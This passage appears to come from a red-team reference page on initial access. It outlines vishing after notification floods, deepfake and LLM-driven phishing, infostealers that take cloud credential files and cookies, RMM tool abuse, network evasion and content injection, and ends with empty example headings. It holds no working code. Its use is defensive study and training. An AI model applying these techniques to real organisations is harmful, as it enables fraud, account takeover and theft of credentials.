Multi-stage approach: notification flood ? vishing call ? access grant
Spam Bombing Prerequisites
Overwhelm victims with legitimate service notifications (password resets, MFA enrollments, subscription alerts)
Create panic and urgency state in target
Coordinate timing with follow-up vishing call offering "help"
Target multiple channels simultaneously (email, SMS, push notifications, app alerts)
Leverage real services to avoid detection (Office 365, Azure, AWS notifications)
Help Desk Social Engineering
Impersonate legitimate IT staff to internal help desk systems
Request password resets and MFA setting changes with social proof
Exploit organizational charts gathered via LinkedIn/OSINT
Chain with other techniques for enhanced credibility
Use insider knowledge (org structure, naming conventions, recent incidents)
GenAI-Powered Social Engineering
Artificial intelligence has revolutionized social engineering capabilities in 2025:
Deepfake Voice Cloning
Real-time voice synthesis for executive impersonation
Training on 10-30 seconds of target audio (LinkedIn videos, earnings calls, podcasts)
Bypasses voice biometric authentication systems
Effective for CEO fraud and wire transfer requests
Tools: ElevenLabs, Respeecher, PlayHT (commercial), open-source alternatives
Synthetic Video Generation
AI-generated video for Teams/Zoom call authentication bypass
Deepfake video impersonation of executives or IT staff
Real-time face swap during video calls
Bypasses video-based identity verification
Detection challenges: subtle artifacts, poor lighting excuses
AI-Generated Social Presence
Fake LinkedIn profiles with consistent post history
AI-written connection requests and messages at scale
Automated social media presence building
Synthetic profile photos (ThisPersonDoesNotExist.com)
Believable professional backgrounds and endorsements
Automated Spear-Phishing at Scale
LLM-generated personalized phishing content
Context-aware messages based on OSINT scraping
Industry-specific lingo and reference inclusion
Grammatically perfect, culturally appropriate content
A/B testing of different approaches automatically
Real-Time Conversational AI
ChatGPT-style interfaces for live victim interaction
Adaptive responses based on victim's technical sophistication
Multi-turn social engineering conversations
Handles objections and builds trust dynamically
Mimics organizational communication styles
Cloud Initial Access Evolution
Information Stealer Evolution
Stealc and Vidar specifically targeting cloud credentials
Browser cookie/session token extraction from Chrome, Edge, Firefox
Credential harvesting from password managers (LastPass, 1Password, Bitwarden)
Cloud CLI configuration files (
.aws/credentials,.azure/,.kube/config)Persistent token storage in application data directories
Attack Vectors
Credential stuffing against cloud portals (Office 365, AWS Console, GCP, Azure Portal)
Session hijacking via stolen browser cookies
OAuth token theft from authenticated developer workstations
Exposed API keys in public GitHub repositories, Docker images, CI/CD logs
Compromised service account credentials with excessive permissions
Targeting Patterns
Finance teams (O365 admin access, payment processing)
DevOps engineers (cloud infrastructure admin keys)
Executive accounts (broad access, privilege escalation targets)
Automated systems (service accounts with no MFA)
Cloud Trust Relationship Exploitation
Modern cloud architectures create trust relationships that attackers exploit for lateral movement:
Cross-Tenant Attacks
Abuse trust between business partners and cloud tenants
Exploit Azure AD B2B guest access with excessive permissions
Leverage AWS cross-account IAM roles with overly permissive policies
GCP shared VPC and organization-level service accounts
Federated Identity Chain Attacks
Compromise on-premises AD to access federated cloud identities
SAML response manipulation for privilege escalation
OAuth application consent grant attacks
Azure AD Connect sync account compromise
Supply Chain Trust Abuse
SaaS-to-SaaS integrations with broad OAuth scopes
Third-party app marketplace installations
Managed service provider (MSP) access abuse
Cloud marketplace image/container supply chain
Shared Responsibility Model Gaps
Misunderstanding of provider vs customer security boundaries
Unprotected customer-managed keys and secrets
Misconfigured network security groups and firewalls
Public snapshots and backups containing sensitive data
Access Broker Marketplace
Specialized cybercriminal services for acquiring and selling initial access:
Market Dynamics
Dark web marketplaces (Genesis, Russian Market, 2easy)
Telegram channels for real-time access sales
Auction-style pricing for premium targets
Guaranteed access with money-back provisions
Access Types Sold
VPN credentials with valid MFA tokens
RDP access to internal networks
Cloud administrator accounts
Email account access (C-level executives)
Database credentials
Source code repository access
RMM Tool Abuse Revolution
Shift from traditional malware delivery to legitimate remote monitoring and management tool abuse:
Common Abused Tools
AnyDesk: Most frequently abused, easy deployment, legitimate appearance
TeamViewer: Corporate trusted, less likely to be blocked
ConnectWise Control (formerly ScreenConnect): IT support standard
RemotePC, Splashtop, LogMeIn: Various commercial RMM solutions
Microsoft Quick Assist: Built into Windows, requires no installation
Attack Flow
Social engineering victim to install RMM tool ("IT support" pretext)
Voluntary installation bypasses application whitelisting
Legitimate process makes EDR detection challenging
Persistent remote access without custom malware
Conduct reconnaissance, data exfiltration, deployment of secondary payloads
Advanced Techniques:
Pre-positioning RMM tools during "test" support calls
Creating scheduled tasks for RMM tool persistence
Disabling notifications and UI elements
Using portable/silent installers
Chaining multiple RMM tools for redundancy
HEAT Attacks (Highly Evasive Adaptive Threats)
A class of sophisticated attacks designed to bypass traditional network security defenses through technical exploitation:
Core Characteristics
Designed to evade inline security inspection (proxies, firewalls, IDS/IPS)
Exploit technical limitations and blind spots in security tools
Target web browsers as primary attack vector
Adaptive evasion techniques that respond to detection attempts
Multi-stage payload delivery avoiding sandbox analysis
Evasion Techniques
Protocol Manipulation:
HTTP/2 multiplexing abuse to hide malicious streams
WebSocket tunneling to bypass proxy inspection
DNS tunneling for command and control
QUIC/HTTP/3 adoption before security tools support it
Encrypted SNI (ESNI) / ECH to hide destination domains
Content Obfuscation:
JavaScript obfuscation and anti-debugging
WebAssembly (WASM) payloads difficult to analyze
Steganography in images and media files
Base64 encoding chains and custom encodings
Dynamic code generation client-side
Browser Exploitation:
Abuse of browser features (Service Workers, Web Workers)
IndexedDB and LocalStorage for persistent staging
Browser extension vulnerabilities
WebRTC for peer-to-peer C2 channels
Progressive Web App (PWA) installation for persistence
Sandbox Evasion:
Environment detection (headless browser, VM detection)
Time-based triggers and user interaction requirements
Geolocation and timezone checks
Canvas fingerprinting to identify analysis systems
Delayed payload execution after extended user interaction
Network Layer Evasion:
Domain generation algorithms (DGA) for C2
Fast-flux DNS to evade blocking
Content delivery network (CDN) abuse for hosting
Domain fronting and domain borrowing
Cloud provider IP reputation leveraging
Detection Strategies:
Deploy TLS inspection with proper certificate handling
Implement behavioral analysis beyond signature matching
Monitor for unusual browser behavior patterns
Track anomalous DNS queries and WebSocket connections
Analyze JavaScript execution patterns in browser telemetry
Content Injection (MITRE T1659)
Adversaries inject malicious content into systems via online network traffic interception and modification:
Attack Mechanisms
Man-in-the-Middle Content Modification:
HTTP response injection (unencrypted traffic)
TLS downgrade attacks to enable injection
Compromised proxies modifying legitimate content
ISP/network provider level injection
Public WiFi attack scenarios
DNS Hijacking for Content Delivery:
Compromised DNS servers returning malicious IPs
DNS cache poisoning on recursive resolvers
Rogue DHCP servers providing malicious DNS
DNS rebinding attacks for local network access
NXDOMAIN hijacking by ISPs
BGP Hijacking for Large-Scale Campaigns:
Border Gateway Protocol route hijacking
Traffic redirection to attacker-controlled servers
Man-in-the-middle at internet backbone level
Difficult to detect for end users
Affects entire regions or networks
CDN Compromise for Supply Chain Injection:
Compromise of content delivery networks
Injection into popular JavaScript libraries
Waterhole attacks via trusted CDN assets
Package repository compromise (npm, PyPI)
Browser extension supply chain attacks
WebSocket Injection:
Hijacking WebSocket connections
Injecting commands into real-time applications
Chat application and gaming platform abuse
IoT device control channel interception
HTTP Header Injection:
Manipulating response headers
Setting malicious
Content-Security-PolicyCache poisoning via header manipulation
Cookie injection and session hijacking
Practical Attack Examples
Example 1: Public WiFi MitM:
Example 2: DNS Hijacking Campaign:
Example 3: BGP Hijacking:
Diagrams
Antivirus
Last updated